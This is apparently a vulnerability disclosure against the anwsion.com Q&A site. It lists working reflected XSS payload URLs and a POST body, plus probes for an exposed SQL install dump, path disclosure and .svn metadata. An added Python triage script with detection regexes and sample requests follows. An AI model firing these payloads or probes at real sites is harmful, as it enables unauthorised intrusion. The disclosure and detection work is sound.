### Brief description

If this gets ignored again I'm going to cry.

### Details

1. XSS

```
http://wenda.anwsion.com/home/explore/category-3%22%3E%3Ciframe%20src=//www.baidu.com%3E
http://wenda.anwsion.com/home/explore/page-5__sort_type-hot__category-3_%22%3E%3Ciframe%20onload=alert(/xss/)%3E-1
http://wenda.anwsion.com/search/q-MTwvdGl0bGU+MTxTY1JpUHQgPmFsZXJ0KC94c3MvKTwvU2NSaVB0Pg==#all
http://dev.anwsion.com/?q="><iframe onload=alert(/xss/)>
http://dev.anwsion.com/?act=login
POST: password=password&referer="><iframe onload=alert(1)>&username=hehe
```

2. Database information disclosure

```
http://dev.anwsion.com/sql/install/database.sql
```

3. Path disclosure

```
http://dev.anwsion.com/i/?act=getentry&page[]=1
```

4. SVN metadata exposed

```
http://static.anwsion.com/.svn/entries
http://static.anwsion.com/admin/.svn/entries
```

5. SQL injection (see screenshots)

### Proof of vulnerability

![Screenshot 1](https://images.seebug.org/upload/201210/16214329a82c2de5f0fa7fb98781a2eaf1c1c5b2.jpg)

![Screenshot 2](https://images.seebug.org/upload/201210/1621431822d99cc088cff9e0762dc129933404ee.jpg)

![Screenshot 3](https://images.seebug.org/upload/201210/16214311bf7e65fccc4940778b6b9a2a0e07f780.jpg)

![Screenshot 4](https://images.seebug.org/upload/201210/16214306b4f81363c91aad8fd70bbe16cc3f8d8c.jpg)

![Screenshot 5](https://images.seebug.org/upload/201210/16214301f3ebd6517484c4a726b585ecfc5d9501.jpg)

![Screenshot 6](https://images.seebug.org/upload/201210/162142569393761ba6178f7e733320f21b44dd75.jpg)

![Screenshot 7](https://images.seebug.org/upload/201210/16214251133650f2f90fb1140449da4dcc9a4b1b.jpg)

![Screenshot 8](https://images.seebug.org/upload/201210/162142409b6016f6e84fc9de2ead295e61f82316.jpg)
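The findings above fall into four classes a site operator can recognise in request logs: reflected markup in a query string or POST body (including the base64-wrapped variant in the search URL), direct fetches of an install-time SQL dump, array-style parameters used to provoke path-revealing PHP warnings, and reads of `.svn/entries`. The following Python triage script is an added example, not part of the original report and not code from anwsion.com; it classifies a request by those patterns, decodes base64-looking path segments so the search payload is not missed, and runs over a constructed sample set modelled on the report rather than on any real log. The rule names and the helper functions (`classify`, `triage`) are this example's own.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# One regex per finding class in the report, applied to the percent-decoded
# request path, query and body. These are triage heuristics: expect some
# false positives and review every hit by hand.
RULES = {
    "xss_markup": re.compile(
        r"<\s*(iframe|script|img|svg|body)\b|<[a-z]+[^>]*\son[a-z]+\s*=", re.I),
    "svn_exposure": re.compile(r"/\.svn/(entries|wc\.db)\b", re.I),
    "sql_dump": re.compile(r"/(install|sql)/[^/?\s]*\.sql\b", re.I),
    "array_param_probe": re.compile(r"[?&][a-z_]+\[\]=", re.I),
}

# Runs of base64 alphabet long enough to wrap a tag; the report's search URL
# hides its payload this way, so such tokens are decoded and rescanned.
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def _decode_b64(token: str) -> str:
    """Decode a candidate token; anything that is not valid base64 yields ''."""
    try:
        return base64.b64decode(token, validate=True).decode("utf-8", "ignore")
    except (binascii.Error, ValueError):
        return ""


def classify(path: str, body: str = "") -> list[str]:
    """Return the sorted finding classes matched by one request, [] if clean."""
    # Decode twice so a single layer of double-encoding does not hide a tag.
    text = unquote(unquote(path)) + " " + unquote(unquote(body))
    candidates = [text] + [_decode_b64(t) for t in B64_TOKEN.findall(text)]
    hits = {name for name, rx in RULES.items()
            for cand in candidates if cand and rx.search(cand)}
    return sorted(hits)


# Constructed sample traffic (path, body) modelled on the report; not a real log.
SAMPLE_REQUESTS = [
    ("/home/explore/category-3%22%3E%3Ciframe%20src=//www.baidu.com%3E", ""),
    ("/search/q-MTwvdGl0bGU+MTxTY1JpUHQgPmFsZXJ0KC94c3MvKTwvU2NSaVB0Pg==", ""),
    ("/?act=login",
     "password=password&referer=%22%3E%3Ciframe%20onload=alert(1)%3E&username=hehe"),
    ("/sql/install/database.sql", ""),
    ("/i/?act=getentry&page[]=1", ""),
    ("/admin/.svn/entries", ""),
    ("/home/explore/category-3", ""),                        # benign
    ("/?act=login", "password=hunter2&referer=/home&username=alice"),  # benign
]


def triage(requests=SAMPLE_REQUESTS) -> list[tuple[str, list[str]]]:
    """Pair each flagged request path with its finding classes, dropping clean ones."""
    return [(path, classes) for path, body in requests
            if (classes := classify(path, body))]


if __name__ == "__main__":
    for path, classes in triage():
        print(f"{', '.join(classes):>18}  {path}")
```

The base64 step is what distinguishes this from a plain string match: the search URL contains no literal `<` or `>`, yet decoding the token after `q-` reveals the same reflected markup as the other XSS entries. A hit on `sql_dump` or `svn_exposure` with a 200 response is the signal that the file is actually being served and should be removed or denied at the web server, independent of whether the request looked like a scanner.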